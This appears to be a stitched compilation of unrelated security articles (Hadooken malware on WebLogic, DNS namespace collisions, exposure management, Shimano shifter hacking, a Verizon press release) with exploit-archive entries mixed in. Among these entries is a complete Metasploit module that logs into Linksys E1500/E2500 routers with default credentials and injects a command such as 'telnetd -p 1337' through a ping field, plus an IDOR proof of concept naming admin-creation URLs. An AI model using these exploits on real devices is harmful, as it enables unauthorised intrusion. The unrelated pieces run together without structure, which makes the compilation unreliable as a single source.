An attacker is using the tool to deploy a cryptominer and the Tsunami DDoS bot on compromised systems.

Source: TippaPatt via Shutterstock

A threat actor is dropping a cryptominer and distributed denial-of-service (DDoS) malware on Oracle WebLogic Servers using "Hadooken."

Researchers at Aqua Nautilus spotted the malware when it hit one of their honeypots last month. Their subsequent analysis showed Hadooken to be the main payload in an attack chain that began with the threat actor brute-forcing its way into the administration panel of Aqua's weakly protected WebLogic honeypot. It appears Hadooken's authors named the malware after the iconic Surge Fist move in the Street Fighter series of video games.

Once inside the Aqua system, the attacker downloaded Hadooken to it using two nearly functionally identical scripts — a Python script and a "c" shell script — with one likely acting as a backup for the other. Aqua found both scripts designed to run Hadooken on the compromised honeypot and to then delete the file.

"In addition, the shell script version attempts to iterate over various directories containing SSH data (such as user credentials, host information, and secrets) and uses this information to attack known servers," Aqua's lead researcher, Assaf Morag, said in a report. "It then moves laterally across the organization or connected environments to further spread the Hadooken malware."

**A Valuable Target**

Oracle's WebLogic Server allows customers to build and deploy Java applications. Thousands of organizations — including some of the world's largest banking and financial services companies, professional services firms, healthcare entities, and manufacturing companies — have deployed WebLogic. These deployments include modernizing their Java enterprise application environment, deploying Java apps in the cloud, and building Java microservices. Critical vulnerabilities, including those that have enabled complete takeover of WebLogic Server, have made the technology a frequent target for attacks over the years. Configuration errors, such as weak passwords and Internet-exposed admin consoles, have exacerbated the risks around the platform.

In Aqua's honeypot attack, the threat actor gained initial access to the WebLogic server by brute-forcing past the security vendor's deliberately weak password. Hadooken then dropped two executable files: Tsunami, a malware used in numerous DDoS attacks going back at least a decade; and a cryptominer. In addition, Aqua found the malware creating multiple cron jobs — which schedule commands or scripts to run automatically at specific intervals or times — to maintain persistence on the compromised system.

**Potential for More Trouble**

Aqua's analysis showed no sign of the adversary actually using Tsunami in the attack, but the security vendor didn't rule out the possibility of that happening at a later stage. Equally likely is the possibility that the attacker could tweak Hadooken relatively easily to target other Linux platforms, Morag tells Dark Reading. "At the moment we've only seen indications the attackers are brute-forcing their way to WebLogic Servers," Morag says. "But based on other attacks and campaigns, we assume the attackers won't limit themselves to WebLogic."

It's also likely that the attackers won't limit themselves to cryptocurrency and DDoS malware in future Hadooken campaigns. Aqua's static analysis of the malware showed links in the code to Rhombus and NoEscape ransomware, but no actual use of the code during the attack on its honeypot. Aqua found the threat actor using two IP addresses, one in Germany and the other in Russia, to download Hadooken on compromised systems. The German IP address is one that two other threat groups — TeamTNT and Gang 8220 — have used in previous campaigns, but there is nothing to suggest they are linked to the Hadooken campaign, Aqua said.

The company recommends that organizations consider using mechanisms like infrastructure-as-code scanning tools, cloud security posture management tools, Kubernetes security and configuration tools, runtime security tools, and container security tools to mitigate threats like Hadooken.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

'Hadooken' Malware Targets Oracle's WebLogic Servers

Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command. A ping command against a controlled system for can be used for testing purposes.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linksys E1500/E2500 Remote Command Execution',        'Description' => %q{          Some Linksys Routers are vulnerable to an authenticated OS command injection.          Default credentials for the web interface are admin/admin or admin/password. Since          it is a blind os command injection vulnerability, there is no output for the          executed command. A ping command against a controlled system for can be used for          testing purposes.        },        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],        'License' => MSF_LICENSE,        'References' => [          [ 'OSVDB', '89912' ],          [ 'BID', '57760' ],          [ 'EDB', '24475' ],          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]        ],        'DisclosureDate' => '2013-02-05'      )    )    register_options(      [        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),        OptString.new('CMD', [ true, 'The command to execute', 'telnetd -p 1337'])      ]    )  end  def run    uri = '/apply.cgi'    user = datastore['HttpUsername']    pass = datastore['HttpPassword']    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")    begin      res = send_request_cgi({        'uri' => uri,        'method' => 'GET',        'authorization' => basic_auth(user, pass)      })      return if res.nil?      return if (res.code == 404)      if [200, 301, 302].include?(res.code)        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")      else        print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")        return      end    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])    cmd = datastore['CMD']    # original post request:    # data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&    # action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="    vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")    begin      res = send_request_cgi({        'uri' => uri,        'method' => 'POST',        'authorization' => basic_auth(user, pass),        'vars_post' => {          'submit_button' => 'Diagnostics',          'change_action' => 'gozila_cgi',          'submit_type' => 'start_ping',          'action' => '',          'commit' => '0',          'ping_ip' => '1.1.1.1',          'ping_size' => "&#{cmd}&",          'ping_times' => '5',          'traceroute_ip' => ''        }      })    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")    print_status("#{rhost}:#{rport} - Blind Exploitation - wait around 10 seconds till the command gets executed")  endend

Linksys E1500/E2500 Remote Command Execution

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

Posted Aug 29, 2024

Authored by indoushka

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 0abd7e5d887d9e2204c565886d418ad0656b2616bb80e508761e6e23aa8bf66f

Download | Favorite | View

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new admin.[+] use payload : /admin/user_ad.php or /admin/homead.php[+] http://127.0.0.1/tracking/admin/user_ad.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

The proliferation of new top-level domains (TLDs) has exacerbated a well-known security weakness: Many organizations set up their internal Microsoft authentication systems years ago using domain names in TLDs that didn't exist at the time. Meaning, they are continuously sending their Windows usernames and passwords to domain names they do not control and which are freely available for anyone to register. Here's a look at one security researcher's efforts to map and shrink the size of this insidious problem.

The proliferation of new top-level domains (TLDs) has exacerbated a well-known security weakness: Many organizations set up their internal Microsoft authentication systems years ago using domain names in TLDs that didn’t exist at the time. Meaning, they are continuously sending their Windows usernames and passwords to domain names they do not control and which are freely available for anyone to register. Here’s a look at one security researcher’s efforts to map and shrink the size of this insidious problem.

At issue is a well-known security and privacy threat called “namespace collision,” a situation where domain names intended to be used exclusively on an internal company network end up overlapping with domains that can resolve normally on the open Internet.

Windows computers on a private corporate network validate other things on that network using a Microsoft innovation called Active Directory, which is the umbrella term for a broad range of identity-related services in Windows environments. A core part of the way these things find each other involves a Windows feature called “DNS name devolution,” a kind of network shorthand that makes it easier to find other computers or servers without having to specify a full, legitimate domain name for those resources.

Consider the hypothetical private network internalnetwork.example.com: When an employee on this network wishes to access a shared drive called “drive1,” there’s no need to type “drive1.internalnetwork.example.com” into Windows Explorer; entering “\\\\drive1\\” alone will suffice, and Windows takes care of the rest.

But problems can arise when an organization has built their Active Directory network on top of a domain they don’t own or control. While that may sound like a bonkers way to design a corporate authentication system, keep in mind that many organizations built their networks long before the introduction of hundreds of new top-level domains (TLDs), like .network, .inc, and .llc.

For example, a company in 2005 builds their Microsoft Active Directory service around the domain **company.llc**, perhaps reasoning that since .llc wasn’t even a routable TLD, the domain would simply fail to resolve if the organization’s Windows computers were ever used outside of its local network.

Alas, in 2018, the .llc TLD was born and began selling domains. From then on, anyone who registered company.llc would be able to passively intercept that organization’s Microsoft Windows credentials, or actively modify those connections in some way — such as redirecting them somewhere malicious.

**Philippe Caturegli**, founder of the security consultancy Seralys, is one of several researchers seeking to chart the size of the namespace collision problem. As a professional penetration tester, Caturegli has long exploited these collisions to attack specific targets that were paying to have their cyber defenses probed. But over the past year, Caturegli has been gradually mapping this vulnerability across the Internet by looking for clues that appear in self-signed security certificates (e.g. SSL/TLS certs).

Caturegli has been scanning the open Internet for self-signed certificates referencing domains in a variety of TLDs likely to appeal to businesses, including **.ad, .associates, .center, .cloud, .consulting, .dev, .digital, .domains, .email, .global, .gmbh, .group, .holdings, .host, .inc, .institute, .international, .it, .llc, .ltd, .management, .ms, .name, .network, .security, .services, .site, .srl, .support, .systems, .tech, .university, .win** and **.zone**, among others.

Seralys found certificates referencing more than 9,000 distinct domains across those TLDs. Their analysis determined many TLDs had far more exposed domains than others, and that about 20 percent of the domains they found ending .ad, .cloud and .group remain unregistered.

“The scale of the issue seems bigger than I initially anticipated,” Caturegli said in an interview with KrebsOnSecurity. “And while doing my research, I have also identified government entities (foreign and domestic), critical infrastructures, etc. that have such misconfigured assets.”

**REAL-TIME CRIME**

Some of the above-listed TLDs are not new and correspond to country-code TLDs, like **.it** for Italy, and **.ad**, the country-code TLD for the tiny nation of Andorra. Caturegli said many organizations no doubt viewed a domain ending in .ad as a convenient shorthand for an internal **A**ctive **D**irectory setup, while being unaware or unworried that someone could actually register such a domain and intercept all of their Windows credentials and any unencrypted traffic.

When Caturegli discovered an encryption certificate being actively used for the domain **memrtcc.ad,** the domain was still available for registration. He then learned the .ad registry requires prospective customers to show a valid trademark for a domain before it can be registered.

Undeterred, Caturegli found a domain registrar that would sell him the domain for $160, and handle the trademark registration for another $500 (on subsequent .ad registrations, he located a company in Andorra that could process the trademark application for half that amount).

Caturegli said that immediately after setting up a DNS server for memrtcc.ad, he began receiving a flood of communications from hundreds of Microsoft Windows computers trying to authenticate to the domain. Each request contained a username and a hashed Windows password, and upon searching the usernames online Caturegli concluded they all belonged to police officers in Memphis, Tenn.

“It looks like all of the police cars there have a laptop in the cars, and they’re all attached to this memrtcc.ad domain that I now own,” Caturegli said, noting wryly that “memrtcc” stands for “**Memphis Real-Time Crime Center**.”

Caturegli said setting up an email server record for memrtcc.ad caused him to begin receiving automated messages from the police department’s IT help desk, including trouble tickets regarding the city’s Okta authentication system.

**Mike Barlow**, information security manager for the City of Memphis, confirmed the Memphis Police’s systems were sharing their Microsoft Windows credentials with the domain, and that the city was working with Caturegli to have the domain transferred to them.

“We are working with the Memphis Police Department to at least somewhat mitigate the issue in the meantime,” Barlow said.

Domain administrators have long been encouraged to use **.local** for internal domain names, because this TLD is reserved for use by local networks and cannot be routed over the open Internet. However, Caturegli said many organizations seem to have missed that memo and gotten things backwards — setting up their internal Active Directory structure around the perfectly routable domain **local.ad**.

Caturegli said he knows this because he “defensively” registered local.ad, which he said is currently used by multiple large organizations for Active Directory setups — including a European mobile phone provider, and the **City of Newcastle** in the United Kingdom.

**ONE WPAD TO RULE THEM ALL**

Caturegli said he has now defensively registered a number of domains ending in .ad, such as internal.ad and schema.ad. But perhaps the most dangerous domain in his stable is **wpad.ad**. WPAD stands for Web Proxy Auto-Discovery Protocol, which is an ancient, on-by-default feature built into every version of Microsoft Windows that was designed to make it simpler for Windows computers to automatically find and download any proxy settings required by the local network.

Trouble is, any organization that chose a .ad domain they don’t own for their Active Directory setup will have a whole bunch of Microsoft systems constantly trying to reach out to wpad.ad if those machines have proxy automated detection enabled.

Security researchers have been beating up on WPAD for more than two decades now, warning time and again how it can be abused for nefarious ends. At this year’s DEF CON security conference in Las Vegas, for example, a researcher showed what happened after they registered the domain **wpad.dk**: Immediately after switching on the domain, they received a flood of WPAD requests from Microsoft Windows systems in Denmark that had namespace collisions in their Active Directory environments.

Image: Defcon.org.

For his part, Caturegli set up a server on wpad.ad to resolve and record the Internet address of any Windows systems trying to reach **Microsoft Sharepoint** servers, and saw that over one week it received more than 140,000 hits from hosts around the world attempting to connect.

The fundamental problem with WPAD is the same with Active Directory: Both are technologies originally designed to be used in closed, static, trusted office environments, and neither was built with today’s mobile devices or workforce in mind.

Probably one big reason organizations with potential namespace collision problems don’t fix them is that rebuilding one’s Active Directory infrastructure around a new domain name can be incredibly disruptive, costly, and risky, while the potential threat is considered comparatively low.

But Caturegli said ransomware gangs and other cybercrime groups could siphon huge volumes of Microsoft Windows credentials from quite a few companies with just a small up-front investment.

“It’s an easy way to gain that initial access without even having to launch an actual attack,” he said. “You just wait for the misconfigured workstation to connect to you and send you their credentials.”

If we ever learn that cybercrime groups are using namespace collisions to launch ransomware attacks, nobody can say they weren’t warned. **Mike O’Connor**, an early domain name investor who registered a number of choice domains such as bar.com, place.com and television.com, warned loudly and often back in 2013 that then-pending plans to add more than 1,000 new TLDs would massively expand the number of namespace collisions.

Mr. O’Connor’s most famous domain is **corp.com**, because for several decades he watched in horror as hundreds of thousands of Microsoft PCs continuously blasted his domain with credentials from organizations that had set up their Active Directory environment around the domain corp.com.

It turned out that Microsoft had actually used corp.com as an example of how one might set up Active Directory in some editions of Windows NT. Worse, some of the traffic going to corp.com was coming from Microsoft’s internal networks, indicating some part of Microsoft’s own internal infrastructure was misconfigured. When O’Connor said he was ready to sell corp.com to the highest bidder in 2020, Microsoft agreed to buy the domain for an undisclosed amount.

“I kind of imagine this problem to be something like a town \[that\] knowingly built a water supply out of lead pipes, or vendors of those projects who knew but didn’t tell their customers,” O’Connor told KrebsOnSecurity. “This is not an inadvertent thing like Y2K where everybody was surprised by what happened. People knew and didn’t care.”

Local Networks Go Global When Domain Names Collide

Read the full article for key points from Intruder’s VP of Product, Andy Hornegold’s recent talk on exposure management. If you’d like to hear Andy’s insights first-hand, watch Intruder’s on-demand webinar. To learn more about reducing your attack surface, reach out to their team today. 
Attack surface management vs exposure management
Attack surface management (ASM) is the ongoing

_Read the full article for key points from Intruder's VP of Product, Andy Hornegold's recent talk on exposure management. If you'd like to hear Andy's insights first-hand, watch Intruder's on-demand webinar. To learn more about reducing your attack surface, reach out to their team today._

****Attack surface management vs exposure management****

Attack surface management (ASM) is the ongoing process of discovering and identifying assets that can be seen by an attacker on the internet, showing where security gaps exist, where they can be used to perform an attack, and where defenses are strong enough to repel an attack. If there's something on the internet that can be exploited by an attacker, it typically falls under the realm of attack surface management.

Exposure management takes this a step further to include data assets, user identities, and cloud account configuration. It can be summarized as the set of processes that allow organizations to continually and consistently evaluate the visibility, accessibility, and vulnerability of their digital assets.

****The continuous journey of managing threats****

Continuous management is key for a number of reasons. Your business, your attack surface and the threat landscape are not static, they are constantly changing and evolving. New vulnerabilities are disclosed hourly, new exploits for old vulnerabilities are publicly released, and threat actors are updating their techniques continuously. Additionally, new systems and services are often exposed to the internet, and if you are running CI/CD processes, your applications are frequently updated, which could create exploitable security gaps.

****Moving beyond CVEs****

More and more, vulnerability management is being seen through a narrow lens of vulnerabilities that have CVEs. Intruder's team disagreed with this approach, and believes that if there is a weakness in your attack surface, it is a vulnerability regardless of whether it has a CVE associated or not.

So, unlike the narrow approach to vulnerability management, exposure management takes in the entire vista - including misconfigurations and potential weaknesses that don't have an associated CVE. Take SQL injection, for example. It doesn't have a CVE but it's still a vulnerability in your application that could lead to serious consequences if exploited. Additionally, having Windows Remote Desktop exposed to the internet doesn't have an associated CVE, but it introduces risk that an attacker can attempt to exploit. Ultimately, exposure management provides a common name for how we perceive and manage these threats.

****Prioritizing vulnerabilities: the need for context****

Currently, most vulnerability scanners provide a list of vulnerabilities, each as a standalone data point. For example, they might report: 'System X has vulnerability Y; you should go fix it.' However, when dealing with large numbers of vulnerabilities, this information alone isn't enough.

Effective prioritization requires more context to ensure that your team's limited resource is focused on issues that will truly make a difference. For instance, it's crucial to understand which assets support your critical business functions, which vulnerabilities can be chained together to impact critical business functions, and where an attacker could potentially enter your network if these assets were exploited.

This approach transforms the management of vulnerabilities from siloed and isolated tasks into a cohesive strategy, providing the context needed to determine not only _if_ a vulnerability should be fixed, but also _when_.

Much like meditation helps filter out the daily bombardment of thoughts and distractions, Intruder's approach to exposure management aims to sift through the noise to focus on the issues that matter most.

****Why exposure management matters****

Exposure management matters because not everything that can be fixed, should be fixed immediately. Without a strategic approach, you risk wasting valuable time resolving low-impact issues, like an untrusted TLS certificate on an internal network, rather than addressing vulnerabilities that could lead to the compromise of a mission-critical system.

It is possible for you and your team to make a disproportionate and even more meaningful impact on your organization's risk profile by having more time to focus on strategically important activities that secure your organization more effectively. This can be achieved by avoiding a knee-jerk reaction to each vulnerability (akin to playing whack-a-mole), which is what exposure management aims to achieve.

It is possible to reduce the volume of tasks that your team is carrying out by scoping out your environment, understanding which assets support business-critical processes, establishing dedicated teams responsible for the remediation of those assets, and setting thresholds or triggers that specify when issues need to be addressed.

****The need for exposure management****

Recent examples of attackers gaining total control through seemingly innocuous entry points are aplenty.

A developer at Microsoft discovered a deliberately placed backdoor in xz-utils, an essential data compression utility for Linux and Unix-like operating systems. This vulnerability, found in versions 5.6.0 and 5.6.1, allowed an unknown threat actor to execute commands on systems that were running these versions of xz-utils and had SSH exposed to the internet. The discovery's timing was incredibly lucky, it was discovered before the compromised versions of xz-utils could make it into many mainstream Linux distributions like Debian and Red Hat.

Although there were no reported cases of exploitation, the potential risks were substantial. A threat actor would have gained access to those systems, giving them a jumping-off point to compromise other systems on any connected network to extract any and all sensitive data.

Security teams will have spent time and effort chasing down whether they were exposed. With exposure management, it would have been easy to identify any affected versions within your environments and quickly establish that the exposure was minimal since the compromised versions of xz-utils aren't that widespread.

Interestingly, the effort to embed the backdoor took four years, revealing a calculated and long-term scheme to compromise open-source software. This isn't necessarily new, but it shines a spotlight on the fact that advanced persistent threats aren't just focused on large enterprises; if threat actors can compromise an open source package like xz-utils and have it reach mainstream distributions, then everyone is at risk.

Then there's Palo Alto Networks. It issued an urgent call for companies to patch a critical zero-day vulnerability, known as CVE-2024-3400, in its widely used PAN-OS software that powers GlobalProtect firewall products. This flaw, found in the newer versions of the software, allows attackers to take complete control of an affected firewall remotely without requiring authentication, thus representing a significant threat to thousands of businesses relying on these firewalls for security. Given its potential for straightforward remote exploitation, Palo Alto has given this vulnerability the highest severity rating. Using attack surface management tools available to you, identifying vulnerable assets should be nearly instantaneous, and with an exposure management process in place the threshold for remediation should have allowed those responsible for remediation or mitigation to kick into action quickly.

These examples demonstrate how threats can be effectively shut down if organizations shift from a reactive, rush-to-fix approach to proactive exposure management, where they continuously manage their attack surface.

****‍Starting your journey towards effective exposure management****

Getting started with exposure management starts with practical, manageable steps:

1.  **Use what you already have:** First, remember you can leverage the services you're already using. For example, if you're using a tool like Intruder, you already have a vulnerability management and attack surface management provider that can kick-start your approach to exposure management. Alternatively, a consultancy service can conduct attack path mapping exercises and threat profile workshops.
2.  **Define your scope:** When defining the scope of what your exposure management process will cover, focus first on assets that are exposed to the internet, as these are often most vulnerable to attack. Intruder can help by providing you with a view of your internet-facing systems, which you can use as a starting point for your exposure management process. You can also use Intruder's target tagging to segment systems into your defined scopes. In the scoping process, you're also looking to identify individuals who are responsible for remediating the risk when a vulnerability is detected; you can add those users to Intruder and empower them to fix and validate that any issues have been resolved. If the data is available, also remember to keep track of the SaaS applications you use, as they can contain sensitive data and credentials.
3.  **Discover and prioritize your assets:** Use a tool to identify known and unknown assets and identify which are business-critical and support the scope you've defined previously. Intruder automatically discovers new cloud assets by integrating with your cloud accounts and runs automated checks for subdomains. You can also add context to your assets by using tags to specify how systems contribute to your business processes, and what risk they pose to those processes if they were compromised.
4.  **Carry out weakness discovery and prioritization:** The focus next shifts to assessing which of these assets are most at risk of being compromised and which would be the most attractive targets for cyber attackers. With Intruder you can find vulnerabilities in your infrastructure, applications, and APIs, and receive a prioritized list of issues so you know what to act on first. Intruder also provides a continuous approach to vulnerability discovery and prioritization by monitoring your network, showing you what's exposed and kicking off scans when anything changes.
5.  **Act:** Then it's time to act, be that through remediation, mitigation, or risk acceptance. Intruder makes it easy to manage and verify your remediation efforts. Run remediation scans, export issues to your ticketing systems, set up alerts in Slack and Teams, and more.

****Bringing it all back home****

Ultimately, we all have a limited amount of time.

By minimizing distractions and enabling your team to focus on what truly matters, exposure management allows you to achieve the greatest impact with the least time invested.

If your team is focusing on the 25% of vulnerabilities that actually matter, they have 75% extra time to focus on the activities that are critical to keeping your business secure.

Intruder aims to equip organizations to focus on the significant, the impactful, and ultimately, secure their digital landscape in today's fast-paced world.

And if that means more peaceful weekends and confidently stepping away from our desks knowing our assets are protected, then I believe we are on the right path. Perhaps, it's not so much about managing vulnerabilities or exposures but about managing our focus in the endless stream of cybersecurity threats.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Focus on What Matters Most: Exposure Management and Your Attack Surface

Please don’t, actually. But do update your Shimano Di2 shifters’ software to prevent a new radio-based form of cycling sabotage.

Professional cycling has, in its recent history, been prone to a shocking variety of cheating methods and dirty tricks. Performance-enhancing drugs. Tacks strewn on race courses. Even stealthy motors hidden inside of wheel hubs.

Now, for those who fail to download a software patch for their gear shifters—yes, bike components now get software updates—there may be hacker saboteurs to contend with, too.

At the Usenix Workshop on Offensive Technologies earlier this week, researchers from UC San Diego and Northeastern University revealed a technique that would allow anyone with a few hundred dollars of hardware to hack Shimano wireless gear-shifting systems of the kind used by many of the top cycling teams in the world, including in recent events like the Olympics and the Tour de France. Their relatively simple radio attack would allow cheaters or vandals to spoof signals from as far as 30 feet away that trigger a target bike to unexpectedly shift gears or to jam its shifters and lock the bike into the wrong gear.

The trick would, the researchers say, easily be enough to hamper a rival on a climb or, if timed to certain intense moments of a race, even cause dangerous instability. “The capability is full control of the gears. Imagine you're going uphill on a Tour de France stage: If someone shifts your bike from an easy gear to a hard one, you're going to lose time,” says Earlence Fernandes, an assistant professor at UCSD’s Computer Science and Engineering department. “Or if someone is sprinting in the big chain ring and you move it to the small one, you can totally crash a person's bike like that.”

Here's a video demonstration of the researchers’ hacking technique:

The researchers' technique exploits the increasingly electronic nature of modern high-end bicycles, which now have digital components like power meters, wireless control of fork suspensions, and wireless shifters. “Modern bicycles are cyber-physical systems,” the researchers note in their Usenix paper. Almost all professional cyclists now use electronic shifters, which respond to digital signals from shifter controls on the bike's handlebars to move a bicycle's chain from gear to gear, generally more reliably than mechanical shifting systems. In recent years, those wired electronic shifters have transitioned again to wireless versions that pair via a radio connection, such as the popular Di2 wireless shifters sold by the Japanese cycling component firm Shimano, which the researchers focused on.

To exploit those wireless components and sabotage a specific target bike, the researchers' technique does require that a hacker first intercept the target's gear-shift signals at some point before they carry out their attack. The hacker can then replay those signals—even months later—to cause the bike to shift at the hacker's command.

To carry out that eavesdrop-and-replay attack, the researchers used a $1500 USRP software-defined radio, an antenna, and a laptop. They say though that a $350 HackRF would work just as well, and point out that their hardware setup could be miniaturized to the degree that it could be hidden along the sidelines of a race, in a cycling team car, or even in the back pouch of a rider's jersey, such as by implementing it in a Raspberry Pi mini-computer.

Jamming wireless shifters with that toolkit would be considerably easier than even replay attacks, the researchers say. While a jamming attack could prevent a specific rider from shifting gears if a hacker were able to first pick up one of their wireless shifting signals, a saboteur could also simply broadcast a jamming signal at the frequency used by all Shimano shifters, potentially disrupting a large group of racers. The researchers even say that it would be possible to read the shifting signals from an entire peloton of cyclists and then jam everyone _except_ a chosen rider. “You can basically jam everyone except you,” says Northeastern professor Aanjhan Ranganathan, another author of the paper.

Shimano’s Di2 wireless shifting components and the researchers’ hacking toolkit. They say their hardware could easily be miniaturized, by using a Raspberry Pi mini-computer for instance, to make it small enough to be hidden along the sidelines of a race, in a cycling team car, or even in the back pouch of a rider’s jersey.Courtesy of UCSD and Northeastern University

The researchers first reached out to Shimano about their research in March, and the company's engineers worked with them closely to develop a patch. A Shimano spokesperson wrote in a statement to WIRED that the company “identified and created a new firmware update to enhance the security of the Di2 wireless communication systems.”

Shimano says it has provided that firmware update to the professional cycling teams that use its components. But it says its fix won't be more widely available until late August and declined to explain exactly how its update prevents the attacks the researchers identified. “We can share that this update is intended to improve wireless transmission across Shimano Di2 component platforms," the company writes. “We cannot share details on the exact fix at this moment, for obvious security reasons.”

Exactly how the patch will be deployed to customers isn't quite clear either. The company writes that “riders can perform a firmware update on the rear derailleur” using Shimano’s E-TUBE Cyclist smartphone app. But it fails to mention whether the fix will apply to the front derailleur. “More information about this process and steps riders can take to update their Di2 systems will be available shortly,” it concludes.

While Shimano's patching plan leaves a week or two-week gap between the researchers' public presentation of their bike-hacking technique at Usenix and the broad rollout of a fix for customers, UCSD professor Fernandes argues it's unlikely that average riders will be targeted with their technique—at least not immediately. “I find it hard to believe that someone will want to launch such an attack on me during my Saturday group ride,” Fernandes says.

Professional cyclists, however, should be sure to implement the early patch that Shimano has already provided, the researchers say. They note, too, that other brands of wireless shifters may be vulnerable to similar hacking techniques: They focused on Shimano only because it has the largest market share.

In the ruthless world of competitive cycling, which has been rocked to its foundations in recent decades by doping scandals, they argue that rivals hacking each others' shifters is not at all a far-fetched scenario. “This is, in our opinion, a different kind of doping,” says Fernandes. “It leaves no trace, and it allows you to cheat in the sport.”

More broadly, they argue that their radio-based bike hacking research is a cautionary tale about the temptation to add wireless electronic features to every technology, from garage doors to cars to bicycles, and the unintended consequences of that long-term trend—namely, that they've all become vulnerable to forms of replay and jamming attacks of the kind that Shimano is now scrambling to fix.

“This is a repeating pattern,” says Northeastern's Ranganathan, who has also developed solutions for replay attacks on cars’ keyless entry systems. “When manufacturers start putting in wireless features in their products, it has an impact on real-world control systems. And that can cause real physical harm.”

_Corrected at 8/14/2024 at 10:00 am ET to note the correct software-defined radio used in the researchers' experimental setup and remove an incorrect reference to Bluetooth._

Want to Win a Bike Race? Hack Your Rival’s Wireless Shifters

PRESS RELEASE

NEW YORK – Today, Verizon Business released its 2024 Mobile Security Index (MSI) report outlining the top threats to mobile and IoT device security. This year’s report, in its seventh iteration, goes beyond employee-level mobile usage and extends into the usage of IoT devices and sensors and the security concerns the growth of these devices can present especially as remote work continues to be a trend. This expanded view of mobile security concerns for organizations showcases the evolving threat landscape that CIOs and other IT decision makers must contend with.

As dependency on mobile devices grows, so too do the risks, especially in critical infrastructure sectors where the consequences of security breaches can be catastrophic. The 2024 MSI, which surveyed 600 people responsible for security strategy, policy and management, underscores this point.

**Employees are using more mobile and IoT devices, leading to increased cyber risks**

The survey finds that 80% of respondents consider mobile devices critical to their operations, while 95% are actively using IoT devices. However, this heavy reliance comes with significant security concerns. In critical infrastructure sectors, where 96% of respondents report using IoT devices, more than half state that they have experienced severe security incidents that led to data loss or system downtime.

